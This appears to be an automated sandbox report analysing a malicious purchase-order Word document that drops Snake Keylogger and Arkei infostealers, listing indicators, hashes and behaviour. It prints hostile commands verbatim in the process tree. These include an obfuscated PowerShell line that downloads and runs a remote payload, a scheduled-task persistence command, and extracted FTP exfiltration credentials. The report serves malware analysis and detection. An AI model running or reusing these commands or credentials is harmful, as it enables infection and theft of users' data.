Analysis
-
max time kernel
114s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
24-05-2022 19:08
Static task
static1
Behavioral task
behavioral1
Sample
GBE_PO_3000105160.docx
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
GBE_PO_3000105160.docx
Resource
win10v2004-20220414-en
General
-
Target
GBE_PO_3000105160.docx
-
Size
212KB
-
MD5
5a0187dff6fcc8149b2e9d01e20179fa
-
SHA1
143ad92b2253eb5f23fa22d320844510f5c02834
-
SHA256
e79cbe266df0e4a6a72b6be67d0d0d4dc276ee4559c627a3dfd73dd1859af7f5
-
SHA512
b55c14806876fa155ab086ea3851ad25f876a547c6b045b224b9d6b2c3109a158d9361a3a30c0f8b262b9c3f811fc5736b8100b69fc3a9245bf1de145b23bfd7
Malware Config
Extracted
https://www.mediafire.com/file/2xfbajsftslryfu/3.dll/file
Extracted
Protocol: ftp- Host:
103.153.77.98 - Port:
21 - Username:
bvhffasoo3 - Password:
txcmnxcaspo00
Extracted
arkei
Default
Extracted
snakekeylogger
Protocol: ftp- Host:
ftp://103.153.77.98/ - Port:
21 - Username:
bvhffasoo3 - Password:
txcmnxcaspo00
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4100 4196 WSCRIPT.exe 84 -
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger Payload 3 IoCs
resource yara_rule behavioral2/memory/3056-175-0x0000000000400000-0x000000000047C000-memory.dmp family_snakekeylogger behavioral2/memory/3056-176-0x00000000004771AE-mapping.dmp family_snakekeylogger behavioral2/memory/2276-178-0x00000000004771AE-mapping.dmp family_snakekeylogger -
suricata: ET MALWARE Generic gate .php GET with minimal headers
suricata: ET MALWARE Generic gate .php GET with minimal headers
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
-
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
-
Blocklisted process makes network request 2 IoCs
flow pid Process 34 4080 powershell.exe 36 4080 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 324 ddond.com -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation ddond.com -
Loads dropped DLL 4 IoCs
pid Process 2144 aspnet_compiler.exe 2144 aspnet_compiler.exe 3700 aspnet_regbrowsers.exe 3700 aspnet_regbrowsers.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 CasPol.exe Key opened \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 CasPol.exe Key opened \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 CasPol.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops desktop.ini file(s) 2 IoCs
description ioc Process File created C:\Windows\assembly\Desktop.ini RegAsm.exe File opened for modification C:\Windows\assembly\Desktop.ini RegAsm.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 60 checkip.dyndns.org -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\1DT000R9 aspnet_compiler.exe File opened for modification C:\Windows\SysWOW64\4W4OPHD2 aspnet_regbrowsers.exe File opened for modification C:\Windows\SysWOW64\9ZUS2DTR aspnet_regbrowsers.exe File created C:\Windows\SysWOW64\NOP8QQIW aspnet_compiler.exe File opened for modification C:\Windows\SysWOW64\OZUAIEKX aspnet_compiler.exe File opened for modification C:\Windows\SysWOW64\SR1DJ58G aspnet_compiler.exe File opened for modification C:\Windows\SysWOW64\NOP8QQIW aspnet_compiler.exe File created C:\Windows\SysWOW64\SR1DJ58G aspnet_compiler.exe File created C:\Windows\SysWOW64\TJMY5FKX aspnet_compiler.exe File opened for modification C:\Windows\SysWOW64\TJMY5FKX aspnet_compiler.exe File created C:\Windows\SysWOW64\4W4OPHD2 aspnet_regbrowsers.exe File created C:\Windows\SysWOW64\O8Q168Y5 aspnet_compiler.exe File opened for modification C:\Windows\SysWOW64\O8Q168Y5 aspnet_compiler.exe File created C:\Windows\SysWOW64\9ZUS2DTR aspnet_regbrowsers.exe File created C:\Windows\SysWOW64\OZUAIEKX aspnet_compiler.exe File created C:\Windows\SysWOW64\1DT000R9 aspnet_compiler.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4080 set thread context of 3700 4080 powershell.exe 103 PID 4080 set thread context of 2144 4080 powershell.exe 104 PID 4080 set thread context of 3056 4080 powershell.exe 109 PID 4080 set thread context of 2276 4080 powershell.exe 111 -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\assembly RegAsm.exe File created C:\Windows\assembly\Desktop.ini RegAsm.exe File opened for modification C:\Windows\assembly\Desktop.ini RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 4528 3700 WerFault.exe 103 -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 aspnet_compiler.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString aspnet_compiler.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1848 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 232 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Kills process with taskkill 3 IoCs
pid Process 3524 taskkill.exe 3732 taskkill.exe 4892 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 ddond.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e ddond.com -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1576 WINWORD.EXE 1576 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4080 powershell.exe 4080 powershell.exe 4080 powershell.exe 4080 powershell.exe 4080 powershell.exe 4080 powershell.exe 2276 RegAsm.exe 3056 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4080 powershell.exe Token: SeDebugPrivilege 3732 taskkill.exe Token: SeDebugPrivilege 4892 taskkill.exe Token: SeDebugPrivilege 3524 taskkill.exe Token: SeDebugPrivilege 2276 RegAsm.exe Token: SeDebugPrivilege 3056 CasPol.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
pid Process 1576 WINWORD.EXE 1576 WINWORD.EXE 1576 WINWORD.EXE 1576 WINWORD.EXE 1576 WINWORD.EXE 1576 WINWORD.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 2276 RegAsm.exe 3056 CasPol.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1576 wrote to memory of 1948 1576 WINWORD.EXE 83 PID 1576 wrote to memory of 1948 1576 WINWORD.EXE 83 PID 4196 wrote to memory of 4100 4196 EXCEL.EXE 85 PID 4196 wrote to memory of 4100 4196 EXCEL.EXE 85 PID 324 wrote to memory of 4080 324 ddond.com 87 PID 324 wrote to memory of 4080 324 ddond.com 87 PID 324 wrote to memory of 1848 324 ddond.com 88 PID 324 wrote to memory of 1848 324 ddond.com 88 PID 324 wrote to memory of 3524 324 ddond.com 91 PID 324 wrote to memory of 3524 324 ddond.com 91 PID 324 wrote to memory of 3732 324 ddond.com 92 PID 324 wrote to memory of 3732 324 ddond.com 92 PID 324 wrote to memory of 4892 324 ddond.com 95 PID 324 wrote to memory of 4892 324 ddond.com 95 PID 4080 wrote to memory of 1772 4080 powershell.exe 100 PID 4080 wrote to memory of 1772 4080 powershell.exe 100 PID 1772 wrote to memory of 2260 1772 csc.exe 101 PID 1772 wrote to memory of 2260 1772 csc.exe 101 PID 4080 wrote to memory of 3664 4080 powershell.exe 102 PID 4080 wrote to memory of 3664 4080 powershell.exe 102 PID 4080 wrote to memory of 3664 4080 powershell.exe 102 PID 4080 wrote to memory of 3700 4080 powershell.exe 103 PID 4080 wrote to memory of 3700 4080 powershell.exe 103 PID 4080 wrote to memory of 3700 4080 powershell.exe 103 PID 4080 wrote to memory of 3700 4080 powershell.exe 103 PID 4080 wrote to memory of 3700 4080 powershell.exe 103 PID 4080 wrote to memory of 3700 4080 powershell.exe 103 PID 4080 wrote to memory of 3700 4080 powershell.exe 103 PID 4080 wrote to memory of 3700 4080 powershell.exe 103 PID 4080 wrote to memory of 3700 4080 powershell.exe 103 PID 4080 wrote to memory of 3700 4080 powershell.exe 103 PID 4080 wrote to memory of 2144 4080 powershell.exe 104 PID 4080 wrote to memory of 2144 4080 powershell.exe 104 PID 4080 wrote to memory of 2144 4080 powershell.exe 104 PID 4080 wrote to memory of 2144 4080 powershell.exe 104 PID 4080 wrote to memory of 2144 4080 powershell.exe 104 PID 4080 wrote to memory of 2144 4080 powershell.exe 104 PID 4080 wrote to memory of 2144 4080 powershell.exe 104 PID 4080 wrote to memory of 2144 4080 powershell.exe 104 PID 4080 wrote to memory of 2144 4080 powershell.exe 104 PID 4080 wrote to memory of 2144 4080 powershell.exe 104 PID 4080 wrote to memory of 3056 4080 powershell.exe 109 PID 4080 wrote to memory of 3056 4080 powershell.exe 109 PID 4080 wrote to memory of 3056 4080 powershell.exe 109 PID 4080 wrote to memory of 3056 4080 powershell.exe 109 PID 4080 wrote to memory of 3056 4080 powershell.exe 109 PID 4080 wrote to memory of 3056 4080 powershell.exe 109 PID 4080 wrote to memory of 3056 4080 powershell.exe 109 PID 4080 wrote to memory of 3056 4080 powershell.exe 109 PID 4080 wrote to memory of 4944 4080 powershell.exe 110 PID 4080 wrote to memory of 4944 4080 powershell.exe 110 PID 4080 wrote to memory of 4944 4080 powershell.exe 110 PID 4080 wrote to memory of 2276 4080 powershell.exe 111 PID 4080 wrote to memory of 2276 4080 powershell.exe 111 PID 4080 wrote to memory of 2276 4080 powershell.exe 111 PID 4080 wrote to memory of 2276 4080 powershell.exe 111 PID 4080 wrote to memory of 2276 4080 powershell.exe 111 PID 4080 wrote to memory of 2276 4080 powershell.exe 111 PID 4080 wrote to memory of 2276 4080 powershell.exe 111 PID 4080 wrote to memory of 2276 4080 powershell.exe 111 PID 3056 wrote to memory of 4236 3056 CasPol.exe 112 PID 3056 wrote to memory of 4236 3056 CasPol.exe 112 PID 3056 wrote to memory of 4236 3056 CasPol.exe 112 PID 2276 wrote to memory of 100 2276 RegAsm.exe 114 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\GBE_PO_3000105160.docx" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1948
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Windows\SYSTEM32\WSCRIPT.exeWSCRIPT C:\Users\Public\update.js2⤵
- Process spawned unexpected child process
PID:4100
-
-
C:\ProgramData\ddond.comC:\ProgramData\ddond.com https://www.mediafire.com/file/87j3bj0ks0asu58/3.htm/file1⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/2xfbajsftslryfu/3.dll/file'))));Invoke-Expression $MMMMMMM2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iqfr20di\iqfr20di.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1EC3.tmp" "c:\Users\Admin\AppData\Local\Temp\iqfr20di\CSC15E1C9898C1B431E86E078746E3DA2F.TMP"4⤵PID:2260
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"3⤵PID:3664
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"3⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:3700 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 13404⤵
- Program crash
PID:4528
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"3⤵
- Loads dropped DLL
- Drops file in System32 directory
- Checks processor information in registry
PID:2144 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe" & exit4⤵PID:664
-
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- Delays execution with timeout.exe
PID:232
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\netsh.exe"netsh" wlan show profile4⤵PID:4236
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵PID:4944
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵
- Accesses Microsoft Outlook profiles
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:2276 -
C:\Windows\SysWOW64\netsh.exe"netsh" wlan show profile4⤵PID:100
-
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 83 /tn calsaasdendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/ynfsesd18cv2njq/3.htm/file"""2⤵
- Creates scheduled task(s)
PID:1848
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im WinWord.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3732
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3700 -ip 37001⤵PID:1428
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
326KB
MD5ef2834ac4ee7d6724f255beaf527e635
SHA15be8c1e73a21b49f353c2ecfa4108e43a883cb7b
SHA256a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba
SHA512c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2
-
Filesize
326KB
MD5ef2834ac4ee7d6724f255beaf527e635
SHA15be8c1e73a21b49f353c2ecfa4108e43a883cb7b
SHA256a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba
SHA512c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2
-
Filesize
133KB
MD58f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
Filesize
133KB
MD58f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
Filesize
133KB
MD58f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
Filesize
133KB
MD58f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
Filesize
429KB
MD5109f0f02fd37c84bfc7508d4227d7ed5
SHA1ef7420141bb15ac334d3964082361a460bfdb975
SHA256334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA51246eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
Filesize
429KB
MD5109f0f02fd37c84bfc7508d4227d7ed5
SHA1ef7420141bb15ac334d3964082361a460bfdb975
SHA256334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA51246eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
Filesize
1.2MB
MD5bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
Filesize
1.2MB
MD5bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
Filesize
1.2MB
MD5bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
Filesize
1.2MB
MD5bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
